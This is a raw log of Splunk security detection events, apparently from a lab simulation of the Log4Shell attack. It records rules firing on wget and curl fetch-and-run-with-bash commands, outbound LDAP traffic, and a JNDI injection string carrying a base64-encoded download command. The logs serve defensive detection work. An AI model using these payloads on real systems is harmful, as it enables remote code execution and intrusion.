dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645454, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645454, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
